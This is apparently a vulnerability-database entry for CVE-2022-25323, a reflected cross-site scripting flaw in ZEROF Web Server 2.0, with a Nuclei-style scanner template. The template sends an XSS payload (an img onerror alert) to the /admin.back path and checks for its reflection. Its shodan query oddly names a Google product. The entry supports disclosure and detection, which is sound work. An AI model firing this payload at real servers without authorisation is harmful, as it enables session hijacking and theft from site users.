CVE-2022-25323: ZEROF Web Server 2.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: ZEROF Web Server 2.0 | POC: 已公开

漏洞描述

ZEROF Web Server 2.0 allows /admin.back cross-site scripting.

PoC代码[已公开]

id: CVE-2022-25323

info:
  name: ZEROF Web Server 2.0 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0.
  reference:
    - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25323
    - https://awillix.ru
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/awillix/research
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-25323
    cwe-id: CWE-79
    epss-score: 0.08165
    epss-percentile: 0.91863
    cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zerof
    product: web_server
    shodan-query: cpe:"cpe:2.3:a:google:web_server"
  tags: cve,cve2022,xss,zerof

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'back<img src=x onerror=alert(document.domain)>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 401
# digest: 4a0a004730450220636029015f822ec2d32908a3bbef57f8e527c44c6a12834400881e1d6fc8836e022100a4ac185f70a35e1bc147fef38f70be5240d3e22b0dc3dfb6cbdf2f0f4322caad:922c64590222798bb761d5b6d8e72950

相关漏洞推荐